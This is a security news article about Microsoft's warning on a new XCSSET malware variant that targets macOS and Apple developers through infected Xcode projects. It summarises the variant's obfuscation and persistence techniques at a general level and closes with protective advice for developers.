Microsoft has issued a warning about a new variant of the XCSSET malware, which is considered to be one of the biggest threats to the macOS platform. This updated version has been detected in a limited number of attacks aimed at Apple developers, but experts believe its impact could potentially increase significantly in the upcoming weeks.
The XCSSET malware is capable of extracting and dumping data from Safari browsers, implanting JavaScript backdoors into websites, stealing information from various apps like Skype, Telegram, and WeChat, capturing screenshots, encrypting files, and transferring data to systems controlled by hackers. This latest iteration of the malware includes improved obfuscation techniques, updated persistence mechanisms, and new infection strategies, marking the first documented update to the malware since 2022, as revealed by Microsoft Threat Intelligence in a recent post.
“This enhanced features complement the existing capabilities of this malware family, which include targeting digital wallets, gathering data from the Notes app, and transferring system information and files,” the post stated.
The discovery of XCSSET dates back to 2020 when researchers at Trend Micro came across it while investigating a security incident related to Xcode developer projects. The malware has previously targeted software developers by exploiting vulnerabilities and infecting their projects, which served as a means to spread the infection further. If a developer downloaded and built an infected project, XCSSET would also contaminate their projects, potentially leading to a wider supply chain attack due to its wormable capability.
The updated variant of XCSSET represents a significant evolution of the modular malware, incorporating new features that streamline the process for attackers to disseminate XCSSET while concealing their malicious activities. The malware now uses more randomized obfuscation methods for generating payloads to infect Xcode projects, employing techniques like Base64 encoding and obfuscating module names to make the intent of the malware less conspicuous.
Additionally, the new variant includes two novel persistence mechanisms known as the “zshrc” method and the “dock” method. The former involves creating a file that contains the payload and ensuring its launch every time a new shell session is initiated, guaranteeing the malware’s persistence. On the other hand, the “dock” method entails downloading a signed tool from a command-and-control server to manage dock items, replacing legitimate entries with fake ones to execute the malicious payload along with normal operations.
Moreover, the updated XCSSET version deploys fresh infection methods to determine payload placement within Xcode projects, using various options like TARGET, RULE, or FORCED_STRATEGY to cloak its activities and evade detection.
As the macOS platform faces increasing risk from malware and security threats in recent years, Microsoft recommends that developers and users remain vigilant when downloading Xcode projects to prevent exposure to XCSSET. They should verify the authenticity of projects downloaded from repositories and only install applications from reputable sources like official app stores to minimize the risk of malware infiltration.
Users of Microsoft Defender for Endpoint on Mac are assured protection against XCSSET and its variants, as the security solution is capable of detecting all known versions of the malware to safeguard macOS systems from potential attacks.